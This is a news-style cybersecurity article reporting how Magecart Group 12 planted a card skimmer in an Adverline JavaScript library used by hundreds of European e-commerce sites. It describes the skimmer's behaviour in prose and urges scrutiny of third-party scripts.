In a recent cyber incident, Magecart, a notorious hacking collective, has targeted nearly 277 e-commerce websites, employing sophisticated supply-chain tactics to compromise their systems. Researchers from RiskIQ and Trend Micro have identified this particular effort as the work of “Magecart Group 12,” which specifically infiltrated third-party JavaScript libraries used by these sites.
Magecart has previously gained notoriety for its successful heists against large-scale businesses, including well-known names like Ticketmaster and British Airways. Their modus operandi typically involves the injection of malicious JavaScript into e-commerce checkout pages, surreptitiously capturing customer payment information before transmitting it to a remote server operated by the attackers. The recent exploitation marks a significant escalation in their strategy, focusing on third-party vulnerabilities rather than direct attacks on individual websites.
In this case, Magecart Group 12 targeted a JavaScript library from Adverline, a French online advertising firm that numerous European e-commerce platforms rely on for advertising functionalities. By compromising this script, Magecart Group 12 ensured that all websites using the library were unwittingly loading the malicious skimming code.
During their research, Trend Micro outlined how the embedded code was equipped to avoid detection and analysis. The skimmer implements robust anti-reversing techniques, using two obfuscated scripts: one for integrity checks and another for the actual data collection. This dual-layered security prevents quick mitigation efforts, thwarting attempts by site administrators to discern the skimming activity.
Once it infiltrates a site, the malicious code conducts checks to confirm it is operating on a relevant page, one associated with payment processing. It does so by scanning for specific strings in the URL—such as ‘checkout’ or ‘billing’—before it begins its data-skimming operations. It records the input values from payment forms and stores this sensitive information in the browser’s LocalStorage under the key ‘Cache’, encoding it in Base64 format along with a unique identifier in the form of an ‘E-tag’.
The culmination of this attack occurs when the user leaves the payment webpage, at which point the skimmer triggers a JavaScript event to transfer the accumulated data to the attackers’ server through HTTP POST requests, again in Base64 encoding. This seamless operation underscores the urgent need for enhanced scrutiny of third-party libraries utilized by e-commerce platforms.
The implications of these supply-chain attacks are particularly significant for businesses reliant on external resources for operational functionality. Organizations must conduct thorough evaluations and implement rigorous security practices to safeguard against sophisticated adversaries like Magecart. The immediate threat posed by Magecart Group 12 aligns with tactics outlined in the MITRE ATT&CK framework, specifically under initial access, execution, persistence, and exfiltration.
In response to the breach, Adverline has acted promptly to patch the vulnerability and eliminate the malware from its library, yet the incident serves as a stark reminder of the vulnerabilities present in supply-chain dependencies. Organizations within the e-commerce sector must remain vigilant, adopting comprehensive security measures to protect against these evolving cyber threats.
The ongoing evolution of Magecart and similar groups illustrates the critical need for continuous monitoring and improvement of cybersecurity practices. With the ever-present risk of data breaches and financial theft, business leaders must prioritize investment in security measures to fortify their defenses against such adversarial threats.
